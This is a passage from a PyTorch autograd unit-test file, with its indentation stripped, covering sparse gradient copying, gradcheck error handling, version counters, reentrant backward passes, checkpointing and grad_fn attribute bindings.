# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
